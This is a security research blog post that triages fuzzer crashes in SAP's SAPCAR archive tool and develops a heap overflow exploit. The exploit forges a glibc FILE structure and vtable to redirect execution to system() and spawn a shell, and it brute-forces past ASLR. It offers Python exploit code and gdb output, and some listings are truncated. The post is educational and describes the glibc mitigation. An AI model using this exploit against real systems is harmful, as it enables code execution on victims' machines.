SAPCAR Heap Buffer Overflow: From crash to exploit

In this blog post, we will cover the analysis and exploitation of a simple heap buffer overflow found in SAPCAR.

SAP published security note #2441560 classifying the issue as "Potential Denial of Service". This post is our attempt to show that code execution is not only possible but also relatively easy to achieve. The idea is to provide a (hopefully!) cohesive example for other beginners that might be interested in binary exploitation. We will see one possible approach to make sense out of a few hundred crashes obtained through fuzzing, how to identify the root cause of the bug, and how to determine its exploitability. Afterwards, we will develop an exploit using the old and well known file pointer overwrite technique. The last section will go into some more detail about a relevant mitigation implemented in glibc 2.24.

We consider this post to be merely educational, as mounting an attack against a SAP system administrator would require a more reliable exploit (more details are presented in section 4.4).

About the vulnerable software

SAPCAR is a command line utility to work with SAR and CAR archives, which are proprietary archive file formats used by SAP. SAP usually distributes software and packages using this format.

The bug covered in this blog post affects version 721.510 of SAPCAR. Other products and versions might be affected too, but we only tested this particular version.

Crash analysis

The starting point were 507 files that made the SAPCAR binary crash, all of them graciously provided by @martingalloar. The crashes were found using the honggfuzz fuzzer. In particular, the fuzzer was testing the archive contents listing feature, which is invoked with the -tvf command line arguments.

The file names created by honggfuzz contain some relevant information about the crash, such as the program counter register address (which instruction was being executed at the time of the crash), and the description of which signal terminated the process. A sample file looks like this:


A quick inspection of the crashes showed that the PC (program counter) value was repeated several times. This is an indication that the number of unique crashes might be lower than the amount of crashing files. The exact amount of unique PC addresses can be determined with the following command:

$ ls | cut -d '.' -f 3 | uniq | wc -l

This is good news. We are dealing with 13 different crashing points instead of 507.

Triaging crashes

The next logical step is to determine where and why each of the input files is making the binary to crash. For 13 crashes, we could just run the program attached to a debugger and inspect the registers and memory layout at the time of crash. However, it would be nice to extend this approach to handle a larger number of input files.

Luckily for us, there are a couple of tools that can assist us in this endeavor. One of them is the exploitable plugin for gdb. This plugin attempts to classify crashes by severity and likelihood of exploitability. In order to do this, it relies on a set of heuristics that analyze the state of the application that is being debugged.

The exploitable plugin still requires us to run each of the crashing files through gdb. In an attempt to automate this process, we will rely on the crashwalk utility developed by Ben Nagy. It still uses the same gdb plugin, but it eases the task of processing a large number of crashes, providing access to the results in various formats. Installation steps follow:

$ git clone
$ sudo apt-get install golang-go
$ export GOPATH=$HOME/crashwalk/
$ go get -u
$ mkdir src
$ git clone src/exploitable

Crashwalk had some issues picking up the file names as they were, so we did a quick renaming of the crashes to avoid problematic characters and ran the tool:

$ ./crashwalk/bin/cwtriage -root crashes/ -match lala -- ./sapcar_721.510_linux_x86_64 -tvf @@

cwtriage will output results for each crash file, and store everything in the crashwalk.db database by default. We can then query this database using cwdump.

The output includes a classification of the exploitability of the bug. Of course it is not guaranteed and just based on the heuristics used by the exploitable plugin, but it is still a great way to prioritize analysis. We are interested in exploitable bugs, so let's query the crashwalk database to see if there are any:

$ ./crashwalk/bin/cwdump crashwalk.db | sed -n -e '/Classification: EXPLOITABLE/,/END SUMMARY/ p'
Classification: EXPLOITABLE
Hash: f5c06ffc7aa3f42a736f4bb7ea700ef9.5f3bf91c3626b65747adc8881231d81b
Command: ./sapcar_721.510_linux_x86_64 -tvf crashes/lala4
Faulting Frame:
   None @ 0x000000000040c58b: in /home/ubuntu/sapcar_721.510_linux_x86_64
Stack Head (7 entries):
   __GI__IO_unsave_markers   @ 0x00007ffff6bc092a: in /lib/x86_64-linux-gnu/ (BL)
   _IO_new_file_close_it     @ 0x00007ffff6bbd872: in /lib/x86_64-linux-gnu/ (BL)
   _IO_new_fclose            @ 0x00007ffff6bb13ef: in /lib/x86_64-linux-gnu/ (BL)
   None                      @ 0x000000000040c58b: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000041958b: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000042bc43: in /home/ubuntu/sapcar_721.510_linux_x86_64
   None                      @ 0x000000000043fc66: in /home/ubuntu/sapcar_721.510_linux_x86_64
rax=0x00000000005a8594 rbx=0x00000000005a8594 rcx=0x00007fffffffcb00 rdx=0x0000000000008000 
rsi=0x00007ffff6f07b28 rdi=0x00000000005a8594 rbp=0x0000000000000000 rsp=0x00007fffffffcac8 
 r8=0x0000000000a1c770  r9=0x0000000000000000 r10=0x0000000000000477 r11=0x00007ffff6bb1260 
r12=0x0000000000000000 r13=0x00007ffff0000920 r14=0x0000000000a3070d r15=0x000000000000000e 
rip=0x00007ffff6bc092a efl=0x0000000000010202  cs=0x0000000000000033  ss=0x000000000000002b 
 ds=0x0000000000000000  es=0x0000000000000000  fs=0x0000000000000000  gs=0x0000000000000000 
Extra Data:
   Description: Access violation on destination operand
   Short description: DestAv (8/22)
   Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.

We will focus on this input file.
I like the gdb-peda plugin, so I will use it for the following tests. There are more active projects such as gef and pwndbg, but I have not tried them yet.

Running the SAPCAR binary from gdb shows the following output:

RAX: 0x5a8594 (sub    ecx,esi)
RBX: 0x5a8594 (sub    ecx,esi)
RCX: 0x7fffffffcb00 --> 0x5a8594 (sub    ecx,esi)
RDX: 0x8000 
RSI: 0x7ffff6f07b28 --> 0xa2dc30 --> 0x7ffff6f06260 --> 0x0 
RDI: 0x5a8594 (sub    ecx,esi)
RBP: 0x0 
RSP: 0x7fffffffcaf8 --> 0x7ffff6bbd872 (<_IO_new_file_close_it+50>:    test   BYTE PTR [rbx+0x74],0x20)
RIP: 0x7ffff6bc092a (<__GI__IO_unsave_markers+10>:    mov    QWORD PTR [rdi+0x60],0x0)
R8 : 0xa2dc40 --> 0xa304e0 --> 0x0 
R9 : 0x0 
R10: 0x477 
R11: 0x7ffff6bb1260 (<_IO_new_fclose>:    push   r12)
R12: 0x0 
R13: 0x7ffff0000920 --> 0x474e5543432b2b00 ('')
R14: 0xa3056d --> 0x20000000 ('')
R15: 0xe
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
   0x7ffff6bc0920 <__GI__IO_unsave_markers>:    cmp    QWORD PTR [rdi+0x60],0x0
   0x7ffff6bc0925 <__GI__IO_unsave_markers+5>:    mov    rax,rdi
   0x7ffff6bc0928 <__GI__IO_unsave_markers+8>:    je     0x7ffff6bc0932 <__GI__IO_unsave_markers+18>
=> 0x7ffff6bc092a <__GI__IO_unsave_markers+10>:    mov    QWORD PTR [rdi+0x60],0x0
   0x7ffff6bc0932 <__GI__IO_unsave_markers+18>:    mov    rdi,QWORD PTR [rax+0x48]
   0x7ffff6bc0936 <__GI__IO_unsave_markers+22>:    test   rdi,rdi
   0x7ffff6bc0939 <__GI__IO_unsave_markers+25>:    je     0x7ffff6bc0965 <__GI__IO_unsave_markers+69>
   0x7ffff6bc093b <__GI__IO_unsave_markers+27>:    test   DWORD PTR [rax],0x100
0000| 0x7fffffffcaf8 --> 0x7ffff6bbd872 (<_IO_new_file_close_it+50>:    test   BYTE PTR [rbx+0x74],0x20)
0008| 0x7fffffffcb00 --> 0x5a8594 (sub    ecx,esi)
0016| 0x7fffffffcb08 --> 0x7fffffffcb50 --> 0x7fffffffcfe0 --> 0x7fffffffe1d0 --> 0x7fffffffe3b0 --> 0x5af800 (mov    QWORD PTR [rsp-0x18],rbx)
0024| 0x7fffffffcb10 --> 0xa30510 ("sapevents.dll")
0032| 0x7fffffffcb18 --> 0x7ffff6bb13ef (<_IO_new_fclose+399>:    mov    edx,DWORD PTR [rbx])
0040| 0x7fffffffcb20 --> 0xa1c790 --> 0xa2dc60 --> 0xa30520 --> 0x20 (' ')
0048| 0x7fffffffcb28 --> 0x7fffffffcb50 --> 0x7fffffffcfe0 --> 0x7fffffffe1d0 --> 0x7fffffffe3b0 --> 0x5af800 (mov    QWORD PTR [rsp-0x18],rbx)
0056| 0x7fffffffcb30 --> 0xa30510 ("sapevents.dll")
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__GI__IO_unsave_markers (fp=fp@entry=0x5a8594) at genops.c:1065

There is something interesting here: pointers to the FILE structure usually end up in the heap. However, in this case it is pointing to somewhere in the text segment:

gdb-peda$ vmmap 0x5a8594
Start              End                Perm    Name
0x00400000         0x007c9000         r-xp    /home/ubuntu/sapcar_721.510_linux_x86_64

Finding where this file pointer is located and inspecting the surrounding memory shows data that looks a lot like the input file contents:

gdb-peda$ find 0x5a8594
Searching for '0x5a8594' in: None ranges
Found 1 results, display max 1 items:
 [heap] : 0xa1d8d0 --> 0x5a8594 (sub    ecx,esi)
gdb-peda$ x/16xg 0xa1d8d0 - 64
0xa1d890:    0x6d942db80cb306f7    0xb31049e79a5e9c99
0xa1d8a0:    0x5bceaebdc9b16ad3    0x05d38708178849d0
0xa1d8b0:    0x39c05825344a4838    0x00000000005b6750
0xa1d8c0:    0xdacaadadcf57bed4    0x4806b9a200000002
0xa1d8d0:    0x00000000005a8594    0x00007ffff6593fdc
0xa1d8e0:    0x00007ffff6594088    0x30302e3220524143
0xa1d8f0:    0x000081b6f6594752    0x0000000000043200
0xa1d900:    0x00007fff00000000    0x0000000035be41f6

A quick grep shows that these values are present in our test file. In particular, they are located at the very end of it:

$ grep -obUaP "\xa2\xb9\x06\x48\x94\x85\x5a" crashes/lala4
$ xxd crashes/lala4 | grep 7720
00007720: da7a 62ed e2a2 b906 4894 855a            .zb.....H..Z

Can we overwrite more data in the heap? A simple test consists of appending content to the input file and re-running the binary:

$ echo AAAABBBB >> crashes/lala4

This time the crash happens in _IO_feof, and we fully control the value of the file pointer:

Stopped reason: SIGSEGV
_IO_feof (fp=0x42414141415a8594) at feof.c:35

Finding the root cause of the bug

Inspecting the back-trace of all stack frames with the bt command, we find the function that calls feof:

   0x4386f0:    push   rbp
   0x4386f1:    mov    rbp,rsp
   0x4386f4:    mov    QWORD PTR [rbp-0x8],r13
   0x4386f8:    mov    r13,rdi
   0x4386fb:    mov    QWORD PTR [rbp-0x18],rbx
   0x4386ff:    mov    QWORD PTR [rbp-0x10],r12
   0x438703:    sub    rsp,0x20
   0x438707:    mov    r12,rcx
   0x43870a:    mov    rcx,QWORD PTR [r13+0x18]
   0x43870e:    mov    rdi,rsi
   0x438711:    mov    rbx,rdx
   0x438714:    mov    esi,0x1
   0x438719:    call   0x40b3e0 <fread@plt>
   0x43871e:    cmp    rbx,rax
   0x438721:    mov    QWORD PTR [r12],rax
   0x438725:    je     0x438734
   0x438727:    mov    rdi,QWORD PTR [r13+0x18]
   0x43872b:    call   0x40b340 <feof@plt>

Had the file pointer been overwritten when fread at 0x438719 was called, the program would have crashed in fread instead. There is a good chance that this call to fread is the one actually doing the overwrite.

To verify this, we place a breakpoint in fread and re-run the program. In addition, we want to check what is happening to the original file pointer, so we will place a watchpoint that stops execution whenever it is overwritten. We can get the original address of the file pointer by inspecting the parameters passed to any of the file IO functions before the overwrite.

Breakpoint 2, __GI__IO_fread (buf=0x7fffffffcb10, size=0x1, count=0x2, fp=0xa2da10) at iofread.c:31

gdb-peda$ find 0xa2da10
Searching for '0xa2da10' in: None ranges
Found 1 results, display max 1 items:
[heap] : 0xa1d8d0 --> 0xa2da10 --> 0xfbad2488 
gdb-peda$ watch *0xa1d8d0
Hardware watchpoint 1: *0xa1d8d0

We see the first assignment, which is correct:

Hardware watchpoint 1: *0xa1d8d0
Old value = 0x0
New value = 0xa2da10
0x000000000043859f in ?? ()

And a second write as a result of the overflow:

Hardware watchpoint 1: *0xa1d8d0

Old value = 0xa2da10
New value = 0x415a8594
gdb-peda$ bt
#0  0x00007ffff6c3a680 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
#1  0x00007ffff6bbcf79 in __GI__IO_file_xsgetn (fp=0xa2da10, data=<optimized out>, n=0xb5ef) at fileops.c:1434
#2  0x00007ffff6bb2236 in __GI__IO_fread (buf=<optimized out>, size=0x1, count=0xb5ef, fp=0xa2da10) at iofread.c:38
#3  0x000000000043871e in ?? ()
#4  0x000000000040c01a in ?? ()
#5  0x000000000040dc5f in ?? ()
#6  0x0000000000418e23 in ?? ()
#7  0x000000000042bc43 in ?? ()
#8  0x000000000043fc66 in ?? ()
#9  0x00007ffff6b64830 in __libc_start_main (main=0x43ffb0, argc=0x3, argv=0x7fffffffe498, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe488)
    at ../csu/libc-start.c:291

So, we can see that fread is called to read 0xb5ef bytes, resulting in the file pointer overwrite.
Monitoring what is being read sheds some light over the file structure too.

fread  size          contents
#1     0x8 bytes     File Format / Version = CAR 2.00
#2     0x22 bytes    RG (regular file)
#3     0xd bytes     File name = sapevents.dll
#4     0x2 bytes     Block type - SAPCAR_BLOCK_TYPE_COMPRESSED = "DA"
#5     0x4 bytes     ????
#6     0x2 bytes     Block type - SAPCAR_BLOCK_TYPE_COMPRESSED = "DA"
#7     0x4 bytes     ????
#8     0x2 bytes     Block type - INVALID TYPE = "D>"
#9     0x20 bytes    ????
#10    0xb5ef bytes  User controlled data that will overwrite stuff on the heap

Valid block types are DA, ED, UD, and UE. When the file contains another identifier the program will read 32 additional bytes containing some file metadata about which we do not know any details. However, inspecting the last 4 bytes of the input read at #9 shows that it actually contains the size of the next fread.

gdb-peda$ x/32xb 0xa2dc62
0xa2dc62:    0x01    0xac    0xa6    0x08    0x3c    0x27    0xb8    0xc4
0xa2dc6a:    0x62    0x28    0x9d    0x19    0xe2    0xd3    0xa3    0xc3
0xa2dc72:    0xcb    0x94    0x5d    0xec    0x02    0x36    0x7b    0x9f
0xa2dc7a:    0x52    0xb8    0x2a    0xfb    0x1f    0x6a    0xef    0xb5

Editing those bytes in the input file allows us to control the size passed to fread (up to 2 bytes).
One would think that after the size is read, a new call to malloc is done. However, this proved not to be true in this case, which suggests that the program relies on a fixed size buffer. Monitoring previous accesses to malloc and back-tracing the execution flow from there showed an allocation of a fixed 0x1100 bytes buffer prior to the fread that triggers the issue:

   0x40c01e:    mov    rcx,r14
   0x40c021:    mov    esi,0x1100
   0x40c026:    mov    rdi,r14
   0x40c029:    call   0x4a73a0


   0x4a73a0:    push   rbp
   0x4a73a1:    mov    rbp,rsp
   0x4a73a4:    mov    QWORD PTR [rbp-0x28],rbx
   0x4a73a8:    mov    QWORD PTR [rbp-0x20],r12
   0x4a73ac:    mov    rbx,rcx
   0x4a73af:    mov    QWORD PTR [rbp-0x18],r13
   0x4a73b3:    mov    QWORD PTR [rbp-0x10],r14
   0x4a73b7:    mov    r14,rdi
   0x4a73ba:    mov    QWORD PTR [rbp-0x8],r15
   0x4a73be:    mov    edi,esi
   0x4a73c0:    sub    rsp,0x40
   0x4a73c4:    mov    r12d,esi
   0x4a73c7:    mov    r15,rdx
   0x4a73ca:    call   0x459720


   0x45973d:    mov    r13d,edi
   0x45977d:    movsxd rdi,r13d
   0x459780:    call   0x40b0c0 <malloc@plt>

This is the buffer that is later on passed to fread. The overflow is clear now: we are copying an arbitrary amount of data (up to 0xffff in size) into a buffer of size 0x1100.
We also know that it happens because the program determines a dynamic size based on some metadata located in the input file when the block type is unknown. 
Armed with this knowledge, we can craft a simple exploit to gain code execution.


Heap exploitation is a creative process, with a lot of techniques and voodoo-like tricks that usually depend on being able to trigger (semi) reliable allocations and deallocations. A great resource to learn about these techniques is the how2heap repository that the guys from Shellphish put together.

However, in this case exploitation is very straightforward. We know we can overwrite a pointer to a FILE structure, which is sufficient to gain code execution. The technique is very old, but it still remains relevant.

There is a great writeup by Kees Cook on abusing the FILE structure, which you should definitely read.

The main idea is that when a new FILE structure is allocated as a result of a call to fopen, glibc will actually allocate an internal structure that contains the struct _IO_FILE and a pointer to another structure called _IO_jump_t, which stores function pointers associated with the different file operations:

Breakpoint 1, __GI__IO_fread (buf=0xa1d8e8, size=0x1, count=0x8, fp=0xa2da10) at iofread.c:31
gdb-peda$ p *fp
$2 = {
  _flags = 0xfbad2488, 
  _IO_read_ptr = 0x0, 
  _IO_read_end = 0x0, 
  _IO_read_base = 0x0, 
  _IO_write_base = 0x0, 
  _IO_write_ptr = 0x0, 
  _IO_write_end = 0x0, 
  _IO_buf_base = 0x0, 
  _IO_buf_end = 0x0, 
  _IO_save_base = 0x0, 
  _IO_backup_base = 0x0, 
  _IO_save_end = 0x0, 
  _markers = 0x0, 
  _chain = 0x7ffff6f08540 <_IO_2_1_stderr_>, 
  _fileno = 0x3, 
  _flags2 = 0x0, 
  _old_offset = 0x0, 
  _cur_column = 0x0, 
  _vtable_offset = 0x0, 
  _shortbuf = "", 
  _lock = 0xa2daf0, 
  _offset = 0xffffffffffffffff, 
  _codecvt = 0x0, 
  _wide_data = 0xa2db00, 
  _freeres_list = 0x0, 
  _freeres_buf = 0x0, 
  __pad5 = 0x0, 
  _mode = 0x0, 
  _unused2 = '\000' <repeats 19 times>
gdb-peda$ x/xg 0xa2da10 + sizeof(*fp)
0xa2dae8:    0x00007ffff6f066e0
gdb-peda$ x/xg 0x00007ffff6f066e0
0x7ffff6f066e0 <_IO_file_jumps>:    0x0000000000000000
gdb-peda$ p _IO_file_jumps
$6 = {
  __dummy = 0x0, 
  __dummy2 = 0x0, 
  __finish = 0x7ffff6bbd9c0 <_IO_new_file_finish>, 
  __overflow = 0x7ffff6bbe730 <_IO_new_file_overflow>, 
  __underflow = 0x7ffff6bbe4a0 <_IO_new_file_underflow>, 
  __uflow = 0x7ffff6bbf600 <__GI__IO_default_uflow>, 
  __pbackfail = 0x7ffff6bc0980 <__GI__IO_default_pbackfail>, 
  __xsputn = 0x7ffff6bbd1e0 <_IO_new_file_xsputn>, 
  __xsgetn = 0x7ffff6bbcec0 <__GI__IO_file_xsgetn>, 
  __seekoff = 0x7ffff6bbc4c0 <_IO_new_file_seekoff>, 
  __seekpos = 0x7ffff6bbfa00 <_IO_default_seekpos>, 
  __setbuf = 0x7ffff6bbc430 <_IO_new_file_setbuf>, 
  __sync = 0x7ffff6bbc370 <_IO_new_file_sync>, 
  __doallocate = 0x7ffff6bb1180 <__GI__IO_file_doallocate>, 
  __read = 0x7ffff6bbd1a0 <__GI__IO_file_read>, 
  __write = 0x7ffff6bbcb70 <_IO_new_file_write>, 
  __seek = 0x7ffff6bbc970 <__GI__IO_file_seek>, 
  __close = 0x7ffff6bbc340 <__GI__IO_file_close>, 
  __stat = 0x7ffff6bbcb60 <__GI__IO_file_stat>, 
  __showmanyc = 0x7ffff6bc0af0 <_IO_default_showmanyc>, 
  __imbue = 0x7ffff6bc0b00 <_IO_default_imbue>

Since we control the file pointer and the data that is read from the input file, we can craft a fake FILE structure and set a custom vtable pointer.
We will use the pysap library to craft CAR archives without hassle. The library can be easily installed with pip:

$ pip install pysap

Overwriting the file pointer

The first step is to overwrite the file pointer with an arbitrary value. We fill the 0x1100 bytes buffer, add some bytes to fill the heap until where the pointer is located, and then overwrite it.

#!/usr/bin/env python

import struct

from scapy.packet import Raw
from pysap.SAPCAR import *

def overwrite_FILE_pointer(address):
    fill_buf = "A" * 0x1100
    gap_to_fp = "B" * 0x38
    fp = struct.pack("<Q", address)
    return fill_buf + gap_to_fp + fp

def write_exp(data):
    with open("sapevents.dll", "w") as fd:
        fd.write("Some string to compress")

    f = SAPCARArchive("", mode="wb", version=SAPCAR_VERSION_200)

    f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*32 + "\xd0\xd0"))


def main():

if __name__ == "__main__":

Run the PoC to create the file, and run it attached to gdb:

Stopped reason: SIGSEGV
_IO_feof (fp=0x4242424243434343) at feof.c:35

Controlling the execution flow

The next step is to store a fake FILE structure followed by a pointer to our vtable. We are running with ASLR disabled for now, so for testing purposes we can rely on a hard-coded buffer address.

#!/usr/bin/env python
import struct

from scapy.packet import Raw
from pysap.SAPCAR import *

BUF_ADDRESS = 0xa1c798

def build_IO_FILE_struct():
    file_struct = ""
    file_struct += struct.pack("<Q", 0x80018001) # _flags
    file_struct += struct.pack("<Q", 0x41414141) # _IO_read_ptr
    file_struct += struct.pack("<Q", 0x42424242) # _IO_read_end
    file_struct += struct.pack("<Q", 0x43434343) # _IO_read_base
    file_struct += struct.pack("<Q", 0x44444444) # _IO_write_base
    file_struct += struct.pack("<Q", 0x45454545) # _IO_write_ptr
    file_struct += struct.pack("<Q", 0x46464646) # _IO_write_end
    file_struct += struct.pack("<Q", 0x47474747) # _IO_buf_base
    file_struct += struct.pack("<Q", 0x48484848) # _IO_buf_end
    file_struct += struct.pack("<Q", 0x49494949) # _IO_save_base
    file_struct += struct.pack("<Q", 0x50505050) # _IO_backup_base
    file_struct += struct.pack("<Q", 0x51515151) # _IO_save_end
    file_struct += struct.pack("<Q", 0x52525252) # _markers
    file_struct += struct.pack("<Q", 0x53535353) # _chain
    file_struct += struct.pack("<L", 0x54545454) # _fileno
    file_struct += struct.pack("<L", 0x55555555) # _flags2
    file_struct += struct.pack("<Q", 0x56565656) # _old_offset
    file_struct += struct.pack("<H", 0x5757)     # _cur_column
    file_struct += struct.pack("<H", 0x58)       # _vtable_offset
    file_struct += struct.pack("<L", 0x59595959) # _shortbuf
    file_struct += struct.pack("<Q", 0x60606060) # _lock
    file_struct += struct.pack("<Q", 0x61616161) # _offset
    file_struct += struct.pack("<Q", 0x62626262) # _codecvt
    file_struct += struct.pack("<Q", 0x63636363) # _wide_data
    file_struct += struct.pack("<Q", 0x64646464) # _freeres_list
    file_struct += struct.pack("<Q", 0x65656565) # _freeres_buf
    file_struct += struct.pack("<Q", 0x66666666) # __pad5
    file_struct += struct.pack("<L", 0x67676767) # _mode
    file_struct += "A" * 20                      # _unused2

    return file_struct

def build_IO_jump_t_vtable():
    vtable = ""
    vtable += struct.pack("<Q", BUF_ADDRESS + 2 * FILE_STRUCT_SIZE + 8)
    vtable += struct.pack("<Q", 0x41424344) * 21
    return vtable

def overwrite_FILE_pointer(address):
    fake_structure = build_IO_FILE_struct() * 2
    vtable = build_IO_jump_t_vtable()
    fill_buf = "A" * (0x1100 - len(fake_structure) - len(vtable))
    gap_to_fp = "B" * 0x38
    fp = struct.pack("<Q", address)
    return fake_structure + vtable + fill_buf + gap_to_fp + fp

def write_exp(data):
    with open("sapevents.dll", "w") as fd:
        fd.write("Some string to compress")

    f = SAPCARArchive("", mode="wb", version=SAPCAR_VERSION_200)

    f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*32 + "\xd0\xd0"))

def main():
    write_exp(overwrite_FILE_pointer(BUF_ADDRESS + FILE_STRUCT_SIZE))

if __name__ == "__main__":

We create the new archive and run the binary again. This time we will control RIP and redirect execution as expected:

Stopped reason: SIGSEGV
0x0000000041424344 in ?? ()
gdb-peda$ bt
#0  0x0000000041424344 in ?? ()
#1  0x00007ffff6bb129f in _IO_new_fclose (fp=0xa1c870) at iofclose.c:62
#2  0x000000000040c58b in ?? ()
#3  0x000000000041958b in ?? ()
#4  0x000000000042bc43 in ?? ()
#5  0x000000000043fc66 in ?? ()
#6  0x00007ffff6b64830 in __libc_start_main (main=0x43ffb0, argc=0x3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478)
    at ../csu/libc-start.c:291

We can also inspect the file pointer to check that our fake structure was populated correctly (see _IO_new_fclose in the excerpt above):

gdb-peda$ p *(FILE *)0xa1c870
$1 = {
  _flags = 0x80018001, 
  _IO_read_ptr = 0x41414141 <error: Cannot access memory at address 0x41414141>, 
  _IO_read_end = 0x42424242 <error: Cannot access memory at address 0x42424242>, 
  _IO_read_base = 0x43434343 <error: Cannot access memory at address 0x43434343>, 
  _IO_write_base = 0x44444444 <error: Cannot access memory at address 0x44444444>, 
  _IO_write_ptr = 0x45454545 <error: Cannot access memory at address 0x45454545>, 
  _IO_write_end = 0x46464646 <error: Cannot access memory at address 0x46464646>, 
  _IO_buf_base = 0x47474747 <error: Cannot access memory at address 0x47474747>, 
  _IO_buf_end = 0x48484848 <error: Cannot access memory at address 0x48484848>, 
  _IO_save_base = 0x49494949 <error: Cannot access memory at address 0x49494949>, 
  _IO_backup_base = 0x50505050 <error: Cannot access memory at address 0x50505050>, 
  _IO_save_end = 0x51515151 <error: Cannot access memory at address 0x51515151>, 
  _markers = 0x52525252, 
  _chain = 0x53535353, 
  _fileno = 0x54545454, 
  _flags2 = 0x55555555, 
  _old_offset = 0x56565656, 
  _cur_column = 0x5757, 
  _vtable_offset = 0x58, 
  _shortbuf = "", 
  _lock = 0x60606060, 
  _offset = 0x61616161, 
  _codecvt = 0x62626262, 
  _wide_data = 0x63636363, 
  _freeres_list = 0x64646464, 
  _freeres_buf = 0x65656565, 
  __pad5 = 0x66666666, 
  _mode = 0x67676767, 
  _unused2 = 'A' <repeats 20 times>

Spawning a shell

Once in control of the execution flow, there are several alternatives to spawn a shell. Because of NX, we cannot execute code from the heap directly. However, it would be possible to place a ROP chain on the heap, and then pivot the stack pointer to the controlled memory.
Another alternative for the lazy folks is doing system("/bin/sh"). The binary itself provides a call system gadget, and because it is not a PIE executable, the location will remain fixed between runs:

$ objdump -M intel -d sapcar_721.510_linux_x86_64 | grep "<system@plt>"
000000000040bbe0 <system@plt>:
  455db1:	e8 2a 5e fb ff       	call   40bbe0 <system@plt>

The parameter to system is a pointer to the command being executed, and should be passed on the RDI register. Inspecting the contents of this register at the time of the crash, we can see that it is pointing to the flags string in our fake FILE structure:

Stopped reason: SIGSEGV
0x0000000041424344 in ?? ()
gdb-peda$ x/xg $rdi
0xa1c870:	0x0000000080018001

This means we can place the sh string in this buffer, redirect execution to call system and get a shell.
If we do the changes and run the program, we will notice that we are back in the segmentation fault inside _IO_feof.

=> 0x7ffff6bb9912 <_IO_feof+34>:	cmp    r10,QWORD PTR [r8+0x8]
gdb-peda$ info r r8
r8             0x60606060	0x60606060

The problem is that we have changed the flags, and the file functions are now trying to access the _lock pointer. We can get around this by keeping the correct flags and appending ";sh" to execute a shell.
The only modifications from the previous exploit are changing the flags to:

file_struct += "\x01\x80;sh\x00\x00\x00" # _flags

and setting the function pointers in the vtable to the call system gadget:

vtable += struct.pack("<Q", 0x455db1) * 21

Running the binary against the updated exploit file dumps a shell:

gdb-peda$ r -vtf
Starting program: /home/ubuntu/sapcar_721.510_linux_x86_64 -vtf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:18 sapevents.dll
[New process 14925]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
process 14925 is executing new program: /bin/dash
sh: 1: �: not found
[New process 14926]
process 14926 is executing new program: /bin/dash
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)


Fighting against ASLR (dirty dirty)

So far we have only run the program inside gdb, which disables address randomization. The good news is that we only rely on a single fixed address. The location of the call system gadget will not change, the relative offsets will (most likely) not change, and we know RDI will be pointing to the shell command we want to execute. The problem is the location of our buffer in the heap.
Modern exploits usually require an information leak vulnerability in order to calculate relative addresses. I was not able to find one, so the quick and dirty approach to provide a PoC that runs outside of gdb involves brute-forcing.
Heap addresses are usually low, and after a few runs it becomes clear that the last 12 bits are fixed on any given system. We can just grab a valid value from a call to fread and run the program until that heap base is present again, which will eventually happen after a few thousand runs. On my test system, one sample address was 0x19e7798.

$ for i in `seq 1 5000`; do echo $i; ./sapcar_721.510_linux_x86_64 -vtf ; done
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:24 sapevents.dll
Segmentation fault (core dumped)
SAPCAR: processing archive (version 2.00)
-rw-rw-r--          23    25 Apr 2017 21:24 sapevents.dll
sh: 1: �: not found
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)

Doing a real bypass of ASLR is left as an exercise for the reader.

Does this still work?

It does, unless you are running glibc versions 2.24 (released on 2016-08-04) or 2.25 (release on 2017-02-01).
Florian Weimer from RedHat implemented some hardening in mid 2016:

This commit puts all libio vtables in a dedicated, read-only ELF section, so that they are consecutive in memory.  Before any indirect jump, the vtable pointer is checked against the section boundaries, and the process is terminated if the vtable pointer does not fall into the special ELF section.

This means our exploit would crash immediately instead of executing pointers from the vtable we constructed.
At the time of writing, an up-to-date Ubuntu 16.04.2 is running glibc 2.23 by default. I suspect it takes time for distros to update the glibc version, so this ancient technique might still live for a bit longer.